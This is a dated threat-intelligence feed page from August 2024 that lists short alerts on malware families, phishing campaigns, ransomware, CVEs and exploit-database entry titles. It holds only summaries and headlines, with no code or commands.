January(137)  February(207)  March(430) April(317) May(278)  June(237)  July(216)  August(316) September(0) October(0) November(0) December(0) 

DATE

NAME

CATEGORY

SUBCATE

INFO

31.8.24

AA24-242A #StopRansomware: RansomHub RansomwareREPORTRansomware#StopRansomware: RansomHub Ransomware

31.8.24

Insecure Platform Key (PK) used in UEFI system firmware signatureALERTALERTA vulnerability in the user of hard-coded Platform Keys (PK) within the UEFI framework, known as PKfail, has been discovered.

31.8.24

NoteMark < 0.13.0 - Stored XSS

Exploit

WebAppsMultiple

31.8.24

Gitea 1.22.0 - Stored XSS

Exploit

WebAppsMultiple

31.8.24

Invesalius3 - Remote Code Execution

Exploit

WebAppsPython

31.8.24

Windows TCP/IP - RCE Checker and Denial of Service

Exploit

DoSWindows

31.8.24

2024-08-30 - Approximately 11 days of server scans and probesMALWARE TRAFFICMALWARE TRAFFICZip files are password-protected.  Of note, this site has a new password scheme.  For the password, see the "about" page of this website.

31.8.24

2024-08-29 - Phishing email and traffic to fake webmail login pageMALWARE TRAFFICMALWARE TRAFFICZip files are password-protected.  Of note, this site has a new password scheme.  For the password, see the "about" page of this website.

31.8.24

2024-08-26 - GuLoader for Remcos RATMALWARE TRAFFICMALWARE TRAFFICZip files are password-protected.  Of note, this site has a new password scheme.  For the password, see the "about" page of this website.

31.8.24

2024-08-12 - XLoader/Formbook infectionMALWARE TRAFFICMALWARE TRAFFICZip files are password-protected.  Of note, this site has a new password scheme.  For the password, see the "about" page of this website.

31.8.24

Corona Mirai variant distributed via vulnerability exploitation

ALERTS

BOTNETMirai malware variant dubbed Corona has been recently distributed via exploitation of a command injection vulnerability (CVE-2024-7029) in AVTECH IP camera devices. The botnet also attempts to exploit some older vulnerabilities including CVE-2017-17215 in Huawei Routers and CVE-2014-8361 affecting Realtek.

31.8.24

LummaC2 Stealer variant spread via PowerShell execution

ALERTS

VIRUSLummaC2 infostealer has been reported as being distributed in a recent campaign leveraging obfuscated PowerShell commands. LummaC2 is a C-based infostealing malware often sold under the Malware-as-a-Service (MaaS) model. This malware primary functionality is to steal confidential data from the infected endpoints and exfiltrate it to the C2 servers controlled by the attackers.

31.8.24

Middle East targeted by malware using fake Palo Alto VPN

ALERTS

VIRUSA malware campaign targeting organizations in the Middle East has been reported, where attackers use a fake Palo Alto GlobalProtect VPN client to deceive users. This malware employs advanced techniques, including a cleverly disguised command-and-control (C2) infrastructure and tools like Interactsh to communicate with specific hostnames and monitor infection progress. It can execute PowerShell commands, manage processes, and encrypt data.

31.8.24

ALERTS

VIRUSX-FILES is a stealer malware written in C that is actively advertised on underground forums, with ongoing enhancements. Like many other infostealers, it aims to steal and exfiltrate sensitive information from infected systems including browser data, cookies, passwords, autofill data, credit card information, and cryptocurrency wallet details.

31.8.24

CVE-2024-38653 - XXE vulnerability in Ivanti Avalanche

ALERTS

VULNEREBILITYCVE-2024-38653 is a high severity (CVSS score 7.5) XML External Entity (XXE) vulnerability affecting SmartDeviceServer in Ivanti Avalanche, which is an enterprise endpoint management solution allowing for centralized device management within an organization.

31.8.24

Iranian threat actor Elfin deploys 'Tickler' backdoor

ALERTS

VIRUSIranian threat actor Elfin (aka APT33, Peach Sandstorm) has been observed deploying a new custom multi-stage backdoor dubbed Tickler. This malware has targeted government, defense, satellite, and oil and gas sectors in the U.S. and the United Arab Emirates (UAE).

31.8.24

Phishing campaign targets Japan Labor Union Workers

ALERTS

PHISHINGA phishing campaign targeting Japanese workers affiliated with labor unions has been observed. The e-crime actor is impersonating 労働金庫 (Rōdō Kinko), commonly known as Rokin, and the 全国労働金庫協会 (National Association of Labour Banks or Zenkoku Rōdō Kinko Kyōkai), which are part of Japan's unique financial system designed to serve the financial needs of workers.

30.8.24

VoldemortCAMPAIGNCAMPAIGNThe Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort”

30.8.24

GreenCharlieAPTGROUPGreenCharlie Infrastructure Targeting US Political Entities with Advanced Phishing and Malware

30.8.24

MasqueradesMALWAREBackdoorThreat Actors Target the Middle East Using Fake Palo Alto GlobalProtect Tool

30.8.24

Malicious npm PackagesHACKINGMalwareNorth Korea Still Attacking Developers via npm

30.8.24

SLOW#TEMPESTCAMPAIGNAPTFrom Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users

30.8.24

CVE-2023-22527VULNEREBILITYCVECryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem

30.8.24

noMu BackdoorMALWAREBackdoorAPT Attack Case Analysis Report Using noMu Backdoor

30.8.24

APT32APTAPTAdvanced Persistent Threat Targeting Vietnamese Human Rights Defenders

30.8.24

APT29APTAPTState-backed attackers and commercial surveillance vendors repeatedly use the same exploits

30.8.24

CVE-2023-41993VULNEREBILITYCVEA WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (Fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

30.8.24

CVE-2024-4671VULNEREBILITYCVEA use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

30.8.24

CVE-2024-5274VULNEREBILITYCVEA type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

29.8.24

A new Snake Keylogger variant

ALERTS

VIRUSA new Snake Keylogger malware variant has been reported by the researchers from Fortinet. The malware is spread via phishing in form of malicious .xls attachments. The distributed Excel files contain an exploit for an old WordPad RTF vulnerability CVE-2017-0199. The attackers also leverage .hta files, VBscript and PowerShell code within the attack chain of this campaign.

29.8.24

Advanced dropper distributes 'Angry Stealer' infostealer via Telegram

ALERTS

VIRUSAn advanced dropper binary has been identified, designed to deploy an information stealer known as 'Angry Stealer,' which is actively promoted on Telegram and other online platforms. Angry Stealer targets sensitive data such as browser information, cryptocurrency wallets, VPN credentials, and system details, exfiltrating this data via Telegram.

29.8.24

Godzilla webshell deployment campaign

ALERTS

CAMPAIGNA new Godzilla webshell deployment campaign has been reported in the wild. The attackers are targeting organizations running ASP.NET instances with vulnerable environment settings and leverage ViewState function to distribute malicious webshells into the victim's environment.

29.8.24

Czech Republic officials hit by malware campaign using NATO-themed lures

ALERTS

VIRUSA malware campaign targeting government and military officials in the Czech Republic has been reported. The threat actor behind this operation is believed to have Russian origins and heavily relied on open-source offensive tools.

29.8.24

Critical vulnerability CVE-2023-22527 exploited for cryptomining activities

ALERTS

VULNEREBILITYAccording to reports, the critical vulnerability CVE-2023-22527 is actively being exploited in the wild. This vulnerability is a severe OGNL injection flaw in Atlassian Confluence Data Center and Server. Threat actors are exploiting it for cryptojacking, transforming compromised systems into cryptomining networks. The attack vector includes deploying shell scripts and XMRig miners while maintaining persistence through cron jobs.

29.8.24

US voters targeted in phishing campaign

ALERTS

PHISHINGWith the US Presidential Election just a few months away and the press reporting allegations of cyber intrusions affecting the campaigns, we reviewed new domains registered between 1 May and 12 August 2024 containing strings "harris", "walz", or "trump" in the domain. Domains with "vance" in them were excluded due to that string being found in many English words and domains unrelated to the election.

29.8.24

Rocinante mobile malware

ALERTS

VIRUS

Rocinante is a malware variant observed prevalently in campaigns targeted at mobile users in Brazil. Functionality-wise Rocinante has the ability to steal information via keylogging, initiate remote access sessions, simulate swipe movements or touche events on the infected device. The malware might also be leveraged for phishing attacks by displaying bogus login websites and thus targeting the theft of banking credentials.

29.8.24

Emerging loader Emmental spreads malware via disguised binaries

ALERTS

VIRUSA loader called Emmental has been detected in use, being distributed in disguised Windows binaries since February 2024. This loader employs HTA files and utilizes traditional email phishing tactics, including fake videos, to target organizations worldwide. It has been part of several campaigns globally using the Bunny.net CDN provider and WebDAV servers to distribute various malware payloads, such as CryptBot, AsyncRAT, Lumma, Meduza stealer, Xworm, and SectopRAT. The functionality of this tool matches the capabilities advertised in underground markets.

29.8.24

New macOS variant of the HZ RAT backdoor emerges

ALERTS

VIRUSA new macOS variant of the HZ RAT backdoor has been discovered in the wild. According to recent reports, the malware is targeting users of the enterprise messenger DingTalk and the messaging platform WeChat.

29.8.24

AA24-241A Iran-based Cyber Actors Enabling Ransomware Attacks on US OrganizationsREPORTREPORTIran-based Cyber Actors Enabling
Ransomware Attacks on US Organizations

29.8.24

CVE-2024-7029VULNEREBILITYCVECommands can be injected over the network and executed without authentication.

29.8.24

Fortra FileCatalyst Workflow Static HSQLDB PasswordVULNEREBILITYCVEFortra Catalyst Workflow contains a static HSQLDB password that can be used by a remote attacker to access the service with administrative access.

28.8.24

CVE-2024-38856VULNEREBILITYCVEApache OFBiz Incorrect Authorization Vulnerability

28.8.24

CVE-2024-6386VULNEREBILITYCVEThe WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection.

28.8.24

HZ RatMALWAREMacOSHZ Rat backdoor for macOS attacks users of China’s DingTalk and WeChat

27.8.24

Versa Director Zero-Day ExploitationVULNEREBILITYZero-DayTaking the Crossroads: The Versa Director Zero-Day Exploitation

27.8.24

Phishing campaign targeting users in Asia Pacific regions

ALERTS

CAMPAIGNSymantec has recently observed a phishing campaign targeting users in Asia Pacific regions. This campaign utilizes HTML files that post the ill-gotten credentials to 3rd party hosting services, in this case nocodeform[.]io. The messages are delivered from either a 'postmaster' or 'MAILER-DAEMON' address in an effort to obscure themselves.

27.8.24

SVG-Based Phishing Campaign Hits LATAM Industries Email Credentials

ALERTS

CAMPAIGNIn early August, Symantec observed an actor targeting multiple companies in Latin America across the retail, legal, dairy, finance, energy, and automobile manufacturing sectors. The goal was to collect email credentials, which are likely to fuel the initial access broker markets and lead to further compromises with varying impacts, including financial theft, cyber espionage, and ransomware attacks.

27.8.24

Phishing campaign targets VPN users with Cheana Infostealer malware

ALERTS

CAMPAIGNA phishing campaign targeting users downloading VPN software has been reported. As part of the campaign, a phishing site masquerading as a WarpVPN provider is hosted to distribute stealer malware for different operating system platforms. The malware, dubbed Cheana Stealer, collects and exfiltrates various types of information such as in-browser stored data, cookies, passwords, cryptocurrency wallets, and cryptocurrency browser extensions. The Linux and macOS versions have the additional capability of stealing SSH keys and Keychain data.

27.8.24

Dolphin Loader: The new malware-as-a-service threat exploiting RMM tools

ALERTS

VIRUSDolphin Loader is a new Malware-as-a-Service (MaaS) loader that was first observed in July 2024 being sold on Telegram. It is used to distribute various malware payloads, such as  SectopRAT, LummaC2, and Redline, primarily through drive-by downloads.

27.8.24

Attackers Spreading Malware via Infected Websites

ALERTS

VIRUSResearchers have discovered malware that spreads by disguising itself as a browser update on infected websites. When users visit these sites, they are prompted to download a malicious file posing as a browser update for Chrome or Firefox. These files can be in various formats like EXE, ZIP, APPX, or VHD. The VHD file contains a hidden shortcut (LNK) that executes PowerShell commands and connects to the attacker's C2 server.

27.8.24

SpyNote Variant Lurks In South Africa Impersonating Two Major Banks

ALERTS

VIRUSSymantec has recently identified a variant of the SpyNote Android Remote Access Trojan in South Africa's mobile threat landscape. A threat actor is impersonating two major financial institutions, Nedbank and Absa, in an attempt to lure users into installing the malware on their devices, leading to financial losses due to unauthorized transactions, identity theft, and the compromise of sensitive personal information.

27.8.24

Cthulhu Stealer

ALERTS

VIRUSResearchers have recently observed another malware-as-a-service (MaaS) that targets Mac users dubbed Cthulhu. This malware gets delivered as a disk image (DMG) with platform-specific binaries and developed in GoLang. It masquerades as legitimate software to trick users into opening the DMG, then uses macOS's 'osascript' tool to prompt for their password and gain unauthorized access.

27.8.24

CVE-2024-0519VULNEREBILITYCVEOut-of-bounds memory access in V8

27.8.24

CVE-2024-2886VULNEREBILITYCVEUse-after-free in WebCodecs (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-2887VULNEREBILITYCVEType confusion in WebAssembly (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-3159VULNEREBILITYCVEOut-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-4671VULNEREBILITYCVEUse-after-free in Visuals

27.8.24

CVE-2024-4761VULNEREBILITYCVEOut-of-bounds write in V8

27.8.24

CVE-2024-4947VULNEREBILITYCVEType confusion in V8

27.8.24

CVE-2024-5274  Type confusion in V8

27.8.24

CVE-2024-7971VULNEREBILITYCVEType confusion in V8

27.8.24

CVE-2024-39717VULNEREBILITYCVEThe Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The &#8220;Change Favicon&#8221; (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image file.

27.8.24

Microsoft 365 Copilot And Prompt Injections

VULNEREBILITYAIMicrosoft Copilot: From Prompt Injection to Exfiltration of Personal Information

27.8.24

CVE-2024-40766VULNEREBILITYCVESonicOS Improper Access Control Vulnerability

26.8.24

CVE-2024-27132VULNEREBILITYCVECross-site Scripting in MLFlow

26.8.24

CVE-2024-31214VULNEREBILITYCVE(CVSS score: 9.7) - Unrestricted file upload vulnerability in device image upload could lead to remote code execution

26.8.24

CVE-2024-24809VULNEREBILITYCVE(CVSS score: 8.5) - Path Traversal: 'dir/../../filename' and unrestricted upload of file with dangerous type

26.8.24

NGateMALWAREAndroidNGate Android malware relays NFC traffic to steal cash

25.8.24

Aurba 501 - Authenticated RCE

Exploit

WebAppsLinux

25.8.24

HughesNet HT2000W Satellite Modem - Password Reset

Exploit

WebAppsHardware

25.8.24

Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure

Exploit

WebAppsHardware

25.8.24

Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass

Exploit

WebAppsHardware

25.8.24

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config

Exploit

WebAppsHardware

25.8.24

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass

Exploit

WebAppsHardware

25.8.24

Helpdeskz v2.0.2 - Stored XSS

Exploit

WebAppsPHP

25.8.24

Calibre-web 0.6.21 - Stored XSS

Exploit

WebAppsMultiple

25.8.24

sedexpMALWARELinuxUnveiling "sedexp": A Stealthy Linux Malware Exploiting udev Rules

24.8.24

CVE-2021-33044VULNEREBILITYCVE(CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability

24.8.24

CVE-2021-33045VULNEREBILITYCVE(CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability

24.8.24

CVE-2021-31196VULNEREBILITYCVE(CVSS score: 7.2) - Microsoft Exchange Server Information Disclosure Vulnerability

24.8.24

CVE-2022-0185VULNEREBILITYCVE(CVSS score: 8.4) - Linux Kernel Heap-Based Buffer Overflow Vulnerability

24.8.24

Peaklight downloader malware activity reported

ALERTS

VIRUSPeaklight is a new PowerShell-based downloader variant identified by researchers from Mandiant. The malware has been used in recent campaigns distributing various payloads including Lumma infostealer, ShadowLadder and CryptBot. The attackers leverage malicious .lnk files disguised as video files as well as JavaScript droppers within the multi-staged attack chain.

24.8.24

CVE-2024-4885 - Progress Software WhatsUp Gold RCE vulnerability

ALERTS

VULNEREBILITYCVE-2024-4885 is a recently disclosed critical (CVSS score 9.8) unauthenticated remote code vulnerability affecting Progress Software WhatsUp Gold, which is a network monitoring software. The exploitation of the bug might allow unauthenticated attackers to execute arbitrary commands with iisapppool/nmconsole privileges.

24.8.24

Sedexp Linux malware uses udev rules for persistence

ALERTS

VIRUSSedexp is a recently identified threat affecting Linux environments. Sedexp malware has been reported to leverage udev rules for the purpose of establishing persistence on the infected machine. Udev is a device manager system on Linux that allows for management of device nodes in the /dev directory.

24.8.24

PG_MEM - malware targeting PostgreSQL servers for cryptomining

ALERTS

VIRUSPG_MEM is a new malware variant observed recently in the wild. The campaign distributing this malware leverages brute force attacks against vulnerable PostgreSQL database servers. Once the attackers obtain access to the server, an attempt is made to establish persistence by creating a new privileged account. Later on, the threat actors initiate system discovery and deliver the PG_MEM dropper payload that ultimately delivers a XMRig cryptominer to the infected machine.

24.8.24

Qilin ransomwareRANSOMWARERANSOMWAREQilin ransomware caught stealing credentials stored in Google Chrome

24.8.24

PEAKLIGHTMALWAREDownloaderPEAKLIGHT: Decoding the Stealthy Memory-Only Malware

23.8.24

CMoon: A .NET-based malware worm in Russian gas sector

ALERTS

VIRUSCMoon, a .NET-based malware worm, was discovered on the website of a compromised Russian gasification and gas supply company. This malware disguises itself as legitimate regulatory documents and replaces various website links with links to malicious executables.

23.8.24

Casbaneiro in the UAE: Impersonating Sharjah Ports Authority

ALERTS

GROUPIn cybersecurity, ports and related authorities are high-value targets for threat actors due to their integral roles in global supply chains and connections to industries such as transportation, logistics, energy, and government sectors. Crooks often disguise themselves as port authorities to lure other industries into phishing scams or social engineering attacks.

23.8.24

NGate - a novel Android malware able to relay NFC data to the attackers

ALERTS

VIRUSA new campaign leveraging Android malware dubbed NGate has been targeting users of Czech banks. NGate uses a novel technique to relay NFC (near field communication) data from the victims' payment cards via the compromised Android phones and over to the attackers' devices.

23.8.24

North Korean group puNK exploits Windows shortcuts to deploy Lilith RAT

ALERTS

VIRUSA previously unidentified North Korean threat actor group dubbed puNK has been detected using Windows shortcut (LNK) files to distribute malware. When executed, these LNK files download AutoIt scripts from the attacker’s server, which subsequently fetch the final payload, the Lilith RAT. The Lilith RAT, written in C++, is an open-source remote control software that facilitates additional remote operations.

23.8.24

Insom ransomware

ALERTS

RANSOMInsom malware is the latest variant from the Makop ransomware family. The malware encrypts user files and appends .Insom extension to the renamed file names. A unique victim ID and a malware developers' email address is also appended to the file name. The malware has the functionality to remove volume shadow copies from the infected endpoint.

23.8.24

Toll Road Smishing Scams Increasingly Target U.S. Drivers

ALERTS

PHISHINGThe U.S. has an extensive network of toll roads, bridges, and tunnels, and toll services are used to fund the maintenance and development of infrastructure without relying solely on state and federal taxes.

23.8.24

TodoSwift: New macOS threat masquerading as a PDF

ALERTS

VIRUSA new macOS malware dubbed TodoSwift has been identified as disguising itself as a PDF download. The threat actor, likely from North Korea, employs a dropper application developed using Swift/SwiftUI. The dropper deceives users by presenting a seemingly legitimate PDF related to Bitcoin pricing.

23.8.24

North Korean-based threat actor develops MoonPeak RAT

ALERTS

VIRUSMoonPeak is a somewhat recently discovered remote access Trojan (RAT) which has been attributed to North Korean-based threat actors. This RAT is a variant of the open-source XenoRAT malware and has seen multiple evolutions. Cisco Talos researchers have published an analysis of MoonPeak along with related threat actor infrastructure.

23.8.24

Cthulhu MALWAREMacOSFrom the Depths: Analyzing the Cthulhu Stealer Malware for macOS

23.8.24

FM11RF08S MALWAREBackdoorMIFARE Classic: exposing the static encrypted nonce variant... and a few hardware backdoors

23.8.24

CVE-2024-28987VULNEREBILITYCVEWeb Help Desk Hardcoded Credential Vulnerability (CVE-2024-28987)

23.8.24

CVE-2024-20399VULNEREBILITYCVEA vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands.

23.8.24

ALBeastVULNEREBILITYCVEThe Hunt for ALBeast: A Technical Walkthrough

22.8.24

CVE-2024-0519VULNEREBILITYCVEOut-of-bounds memory access in V8

22.8.24

CVE-2024-2886VULNEREBILITYCVEUse-after-free in WebCodecs (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-2887VULNEREBILITYCVEType confusion in WebAssembly (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-3159VULNEREBILITYCVEOut-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)

22.8.24

CVE-2024-4671VULNEREBILITYCVEUse-after-free in Visuals

22.8.24

CVE-2024-4761VULNEREBILITYCVEOut-of-bounds write in V8

22.8.24

CVE-2024-4947VULNEREBILITYCVEType confusion in V8

22.8.24

CVE-2024-5274VULNEREBILITYCVEType confusion in V8

22.8.24

CVE-2024-7971VULNEREBILITYCVEType confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

22.8.24

LiteSpeed Cache VULNEREBILITYCVECritical Privilege Escalation in LiteSpeed Cache Plugin

22.8.24

CVE-2024-6800VULNEREBILITYCVEAn XML signature wrapping vulnerability was present in GitHub Enterprise Server (GHES) when utilizing SAML authentication with specific identity providers. This vulnerability allowed an attacker with direct network access to GitHub Enterprise Server to forge a SAML response to provision and/or gain access to a user with site administrator privileges.

22.8.24

CVE-2024-6337VULNEREBILITYCVEAn Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed a GitHub App with only content: read and pull_request_write: write permissions to read issue content inside a private repository.

22.8.24

CVE-2024-7711VULNEREBILITYCVEAn Incorrect Authorization vulnerability was identified in GitHub Enterprise Server, allowing an attacker to update the title, assignees, and labels of any issue inside a public repository.

22.8.24

PG_MEMMALWARECRYPTOCURRENCYPG_MEM: A Malware Hidden in the Postgres Processes

22.8.24

CVE-2024-38206VULNEREBILITYCVEMicrosoft Copilot Studio Information Disclosure Vulnerability

21.8.24

MoonPeak MALWARERATMoonPeak malware from North Korean actors unveils new details on attacker infrastructure

21.8.24

StyxMALWAREStealerUnmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove

21.8.24

TodoSwiftMALWAREMacOSTodoSwift Disguises Malware Download Behind Bitcoin PDF

21.8.24

Quasar RAT (aka BlotchyQuasar) Malspam Targeting Italian Banks

ALERTS

VIRUSThreat researchers have recently observed an email spam campaign spreading Quasar RAT malware which is primarily targeting Italy. The campaign uses deceptive emails that mimic official communications from the Ministry of the Interior, complete with their logos. While the malware and C2 servers remain the same, the URLs for downloading the malicious files have been updated. The malware specifically targets users of certain Italian banks.

21.8.24

Cybercriminals' Relentless Use of Fake CVs to Breach Corporate Defenses

ALERTS

CRIMEThere is a long list of social engineering tactics in the cybersecurity world, and while it is always fluctuating, some methods are well-established such as sending fake CVs. This tactic involves emailing a fake Curriculum Vitae (CV) and motivation letter, often targeting HR departments or managers.

21.8.24

QWERTY Stealer: New infostealer variant

ALERTS

VIRUSQWERTY is a newly discovered infostealer variant observed being hosted on a Linux-based virtual private server located in Germany with limited service exposure. The malware is capable of performing various checks for the presence of debugging or virtualized environments before execution and has the capability to download additional payloads.

21.8.24

Styx Stealer malware

ALERTS

VIRUSStyx Stealer is a new infostealing malware variant discovered by the researchers from Checkpoint. The malware has the functionality to exfiltrate various data from Chromium-based browsers including cookies, credentials, banking details, cryptocurrency wallets, files with pre-defined extensions, Telegram and Discord sessions, among others.

21.8.24

New Msupedge backdoor employs communication via DNS traffic

ALERTS

VIRUSA previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan. The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen.

21.8.24

A new and emerging malware dubbed UULoaderALERTSVIRUSRecent research has observed a malware campaign with an increase in the use of malicious .msi files, which, while not common, are known as a method of malware distribution. The new malware strain identified is 'UULoader,' used to deliver next-stage payloads such as Gh0st RAT and Mimikatz. It is distributed through malicious installers disguised as legitimate applications, primarily targeting Korean and Chinese-speaking users.

21.8.24

CVE-2024-6220VULNEREBILITYCVE(CVSS score: 9.8) - An arbitrary file upload flaw in the 简数采集器 (Keydatas) plugin that allows unauthenticated attackers to upload arbitrary files on the affected site's server, ultimately resulting in code execution

21.8.24

CVE-2024-6467VULNEREBILITYCVE(CVSS score: 8.8) - An arbitrary file read flaw in the BookingPress appointment booking plugin that allows authenticated attackers, with Subscriber-level access and above, to create arbitrary files and execute arbitrary code or access sensitive information

21.8.24

CVE-2024-5441VULNEREBILITYCVE(CVSS score: 8.8) - An arbitrary file upload flaw in the Modern Events Calendar plugin that allows authenticated attackers, with subscriber access and above, to upload arbitrary files on the affected site's server and execute code

21.8.24

CVE-2024-6411VULNEREBILITYCVE(CVSS score: 8.8) - A privilege escalation flaw in the ProfileGrid – User Profiles, Groups and Communities plugin that allows authenticated attackers, with Subscriber-level access and above, to update their user capabilities to that of an Administrator

21.8.24

pwish HACKINGPHISHINGBe careful what you pwish for – Phishing in PWA applications

21.8.24

UTG-Q-010GROUPGROUPUTG-Q-010: Targeted Attack Campaign Against the AI and Gaming Industry

21.8.24

WireServingEXPLOITEXPLOIT"WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services

21.8.24

CharmingCypressMALWAREFamiliesCharmingCypress: Innovating Persistence

21.8.24

TA453GROUPGROUPBest Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset

21.8.24

BlindEagle APTAPTBlindEagle flying high in Latin America

21.8.24

CVE-2024-23897VULNEREBILITYCVEJenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.

21.8.24

UULoaderMALWARELoaderMeet UULoader: An Emerging and Evasive Malicious Installer.

21.8.24

NUMOZYLOD MALWAREMaasFinding Malware: Unveiling NUMOZYLOD with Google Security Operations

21.8.24

Xeon SenderTOOLPhishimg/SpamXeon Sender | SMS Spam Shipping Multi-Tool Targeting SaaS Credentials

21.8.24

CVE-2024-38193VULNEREBILITYCVEWindows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

21.8.24

FIN7APTAPTFIN7: The Truth Doesn't Need to be so STARK

20.8.24

RedLine Stealer Impersonates Oil and Gas Company, Targets Key Sectors in Vietnam

ALERTS

VIRUSSymantec has recently observed a RedLine Stealer malspam campaign in which an actor is impersonating a leading oil and gas company in Vietnam specializing in exploration and production activities. Both local and international companies in Vietnam across various sectors - including oil and gas, industrial, electrical and HVAC manufacturers, paint, chemical, and hotel industries - are being targeted.

20.8.24

Ailurophile Infostealer

ALERTS

VIRUSAilurophile is a new PHP-based infostealer variant recently identified in the wild. The malware is advertised online and sold via a subscription model. Ailurophiles' capabilities include theft of data stored in browsers including auto-fill information, cookies, credentials, banking details, browsing history and cryptocurrency wallets. The infostealer can also exfiltrate data files from the compromised machines according to a predefined search criteria such as keywords in filenames or specific extensions.

20.8.24

Fake Apps target Indian government's PM Kisan Yojana beneficiaries

ALERTS

VIRUSThe PM Kisan Yojana is a historic initiative by the Indian government that is currently benefiting around eight crore farmers across India. Every year, eligible farmers receive a total of INR 6,000, which is distributed in three equal installments of INR 2,000 each.

20.8.24

Hawk Eye Ransomware

ALERTS

RANSOMA ransomware actor that goes by the name "Hawk Eye" has been observed in the wild. Files that have been successfully encrypted are appended with a random 4-character extension. The ransom note (read_it.txt) is dropped in various folders, and the desktop wallpaper is changed to a white hawk on a black background.

20.8.24

Crypto Investment Scams Posing as Tesla

ALERTS

CRYPTOCURRENCYA recent report reveals that attackers are exploiting Tesla's name to promote cryptocurrency scams. These scammers have registered domains containing 'Tesla' to deceive users into visiting malicious links. The links lead to the download of a harmful Android application, which is promoted on social platforms such as YouTube and Telegram.

20.8.24

Threat actor Damselfly conducts campaigns against the U.S. and Israel

ALERTS

APTDamselfy (aka APT42, Charming Kitten) is a well established Iranian-based threat actor. The group has routinely attacked high value targets in both the U.S. and Israel. The main goal of these attacks is to steal credentials from entities such as NGOs and academic, government, and defense/military organizations to further Iran's own military and political ideals.

20.8.24

BANSHEE Infostealer

ALERTS

VIRUSJust this month, a new macOS malware called "BANSHEE Stealer" was discovered, created by Russian threat actors. It affects both x86_64 and ARM64 macOS systems and poses a significant threat by targeting crucial system information, browser data, and cryptocurrency wallets.

20.8.24

New Gafgyt botnet variant observed in the wild

ALERTS

BOTNETA new Gafgyt botnet variant has been observed in the wild. The malware is spread in a distribution campaign targeting endpoints with weak SSH credentials that deploys two distinct ELF binaries. One of the files is a Go-based Gafgyt binary with various capabilities including system discovery, command execution, scan for exposed SSH/Telnet access and brute force attack execution against the targeted systems. The second binary is a XMRig cryptominer used to mine the Monero cryptocurrency.

20.8.24

New ValleyRAT malware distribution campaign

ALERTS

VIRUSA new ValleyRAT malware distribution campaign targeted at Chinese speakers has been reported by researchers from Fortinet. The attackers behind this campaign rely on various components including shellcode being executed for reflective DLL loading and a beaconing module used for fetching of additional components. The payload of the campaign - ValleyRAT is a multi-staged malware variant with capabilities including monitoring of user activities, screenshot grabbing, plugin execution, arbitrary file download and others.

20.8.24

Cyclops Go-based malware

ALERTS

VIRUSCyclops is a recently identified Go-based malware implant and a likely successor to the BellaCiao malware family. The known malware binary masquerades as "Microsoft SqlServer.exe" executable in an attempt to impersonate SQL server update file and to possibly be deployed on otherwise vulnerable server instances.

17.8.24

.env Files to Breach Cloud Accounts in Extortion CampaignINCIDENTCloud ComputingLeaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments

16.8.24

SharpRhino MALWARERATSharpRhino – New Hunters International RAT Identified by Quorum Cyber

16.8.24

TuskCAMPAIGNMalwareTusk: unraveling a complex infostealer campaign

16.8.24

ValleyRATMALWARERATA Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers

16.8.24

Cuckoo MALWAREMacOSUpdate: Cuckoo Malware Evolves

16.8.24

BANSHEEMALWAREMacOSBeyond the wail: deconstructing the BANSHEE infostealer

16.8.24

Multiple SMTP services are susceptible to spoofing attacks due to insufficient enforcementALERTALERTMultiple hosted, outbound SMTP servers are vulnerable to email impersonation. This allows authenticated users and certain trusted networks to send emails containing spoofed sender information.

16.8.24

Cyclops Go-based malware

ALERTS

VIRUSCyclops is a recently identified Go-based malware implant and a likely successor to the BellaCiao malware family. The known malware binary masquerades as "Microsoft SqlServer.exe" executable in an attempt to impersonate SQL server update file and to possibly be deployed on otherwise vulnerable server instances.

16.8.24

Pupy RAT distributed in recent UTG-Q-010 APT campaign

ALERTS

